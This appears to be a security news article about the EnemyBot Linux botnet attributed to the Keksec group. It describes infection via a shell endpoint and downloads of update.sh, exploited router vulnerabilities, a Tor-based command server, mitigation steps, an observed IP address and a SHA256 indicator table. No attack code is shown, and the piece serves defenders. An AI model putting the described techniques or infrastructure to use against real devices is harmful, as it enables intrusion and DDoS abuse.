A group of researchers have recently identified EnemyBot, a brand new Linux-based botnet. At its first look the DDoS based Botnet is seen to causing infection across a large range of devices and platforms. The initial infection was seen to be making a drive-by attempt to /shell at a web server with an interesting payload attached to the “value” string. The researchers alos saw several attempts to download an “update.sh” file using different methods: wget, busybox, and curl.
The Responsible Attacker Group “Keksec”
The botnet appears to be the work of “Keksec”, who are a group of Cyber-Criminals with expertise in DDoS attacks and cryptocurrency mining. The “Keksec” is tagged to over 400 samples of Malware. The group Keksec (also known as Nero and Freakout) is using the fast-evolving Enemybot to target routers from vendors like Seowon Intech and D-Link and is exploiting a remote code execution (RCE) vulnerability (CVE-2022-27226) discovered last month in iRZ mobile routers. The Malware of the Group, ‘Enemybot’, is also said to be impacting the devises of brand Fortinet. This group is also known for deploying Distributed Denial-of-Service (DDoS) and cryptomining attacks especially targeting Linux-based Gafgyt source among others.
The “Enemybot” Malware
Enemybot, like most botnets, infects multiple architectures to improve the chances of infecting devices and, also among IoT devices, this malware has been designed to target desktop and server architectures like BSD, macOS, Arm and x86. The Malware is also using a range of obfuscation methods to make it more difficult for the malware to be analyzed and to hide it from other botnets. In addition, it connects to a Command-and-Control (C2) server hidden in the Tor network, which increases its anonymity and makes it harder to take it down. Once a device is compromised, Enemybot drops a file in /tmp/.pwned that contains a message pointing to ‘Keksec’ as the attacker. There are many more iterations to the different variants of the attack vector that has been noticed in the recent pattern.
“This mix of exploits targeting web servers and applications beyond the usual IoT devices, coupled with the wide range of supported architectures, might be a sign of Keksec testing the viability of expanding the botnet beyond low-resource IoT devices for more than just DDoS attacks. Based on their previous botnet operations, using them for cryptomining is a big possibility,” said Fortinet that is reporting on the malware.
The Way Forward
The EnemyBot malware appears to follow similar structures and patterns we’ve seen with other common botnets, with a few changes. There appears to be strong correlation to that of the LolFMe botnet which contains other similar strings such as “watudoinglookingatdis”. The LolFMe botnet was quite short-lived and was never popular so it will be interesting to see how far off the ground this particular strain will take the IT Users to. The malware has been noticed to have been built using the source code of the Gafgyt (Bashlite) botnet – which leaked in 2015 – with some modules borrowed from the infamous Mirai botnet, including the scanner module and a bot killer module.
Both LolFMe and Mirai botnets leverage multi-architecture support and RCE as the initial foothold. This was also the case for EnemyBot.
Mitigation Recommendations
Securonix Company (https://www.securonix.com/) has suggested a few Mitigation Remediation:
Some possible actions are recommended that can potentially help proactively mitigate the impact of the EnemyBot attacks on your network.
-
Ensure systems are fully patched and not vulnerable to RCE
-
Patch IoT devices’ firmware to the latest versions to mitigate external exploitation
-
Employ the usage of layer-7 network monitoring and detection to detect common exploits that may leverage RCE
-
Ensure that externally exposed network segments are isolated from internal hosts
-
Disable or limit execution from linux /tmp/ directories
IP Communication observed: 198.12.116.254
Detection and Indicators of Compromise (IoCs):
File Name |
sha256 |
update.sh |
cc36cc84d575e953359d82e8716c37ba2cbf20c6d63727ca9e83b53493509723 |
enemybotarm |
52421da5ee839c9bde689312ff35f10e9bcab7edccc12ee1fe16630e20531aaf adb51a8d112590a6fdd02ac8d812b837bbe0fcdd762dba6bbba0bd0b538f9aef |
enemybotarm5 |
498ecf2ce03960a695d4ba92d4d2e6163917686db29393c4b8d8c9d11d19774d 5e56210f15b653e4ea881f25bfa423af4f4c5ee3a7c9386543fde23e0e7169c8 |
enemybotarm7 |
7ccffe7a3daa58db665db93f816ab0b5a4e9ce0bc7a2490d885250d267ed4bbc 7635758818ca966288ad10fb3d385c177f8cd5554369eeb28f8b52951004ed89 |
enemyboti586 |
f3c4ca5ba23d27a4d297dfef8614b48bbaca6455814d537114f4e6d418f10f47 d9204c9b5018a3028d5c7f966d8c37be9d7d4dd2c5c4cd95cde686cce655c609 |
enemyboti686 |
ae9cc1b644ee435bddc57af2eeab05fb0ba0dc2f81473611bd2f39c1d9be1d1c d0b9e7bbf034e501872ecb276b3b670ae175fff09618d9836356d47f677bdbbc |
enemybotm68k |
5dba7e81c4a03eedee4a33535cfda88d8d178658d0e434ee48bd29d7091c63b5 e4bdf0d87db133824ff183c28c860c08794394eaaf76898899cbeb5f9749ae1f |
enemybotmips |
22db83f9cc631eb3222444328289a3be787c3a8182ccd8004c6cc2b5dc50a12d aeb9f6999fdc3a3dadbe93ff8a1a2de3ac181b43eddcf208c018db88526b5314 |
enemybotmpsl |
c275a1ec95142b7134d7beb153e6126bda9087c152e69497f1990c39d5045399 6dbb0e96180d0946ddd9ff17908cf830fbff5016ff013891e3fdf3c3b33ef2e6 |
enemybotppc |
ea2ff0c01629bdaecceecc59d93de73f01b7b18146986be114503c086fa29976 7ec1fab277b86e022819c9b5a53be05df2af76c5c19b2aa1cf26590d06dcdbcd |
enemybotppc-440fp |
908a95c887d4c46e5058db09e85efba023219793b54b5cd7ea03e1b450784111 a33145dc629c7ca76dc5ec0138fe60b06e8c53bd01f1bb90d9a7e21ff0a391e6 |
enemybotsh4 |
9bb46cfa321d5aa65960fa4563a50eec40de4e221e360162bae4b4e4b40a3540 058d36172d25e7b3db227c02ffba5be3d1b17d0eef7bfd4029c55b16ac2ab06b |
enemybotspc |
f36ade94ba4261fdff37d53c7d7c4935374d9263ec4fe92d2bb6c1def5f0783f b2c92609557eaabe108689a17996befeabb48da70053ae6335a1fcd0c1189249 |
enemybotx86 |
1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50 12e907fae4427a7b0d68adfb33a5e045971bd755f8b7a48299a27736c24c9929 |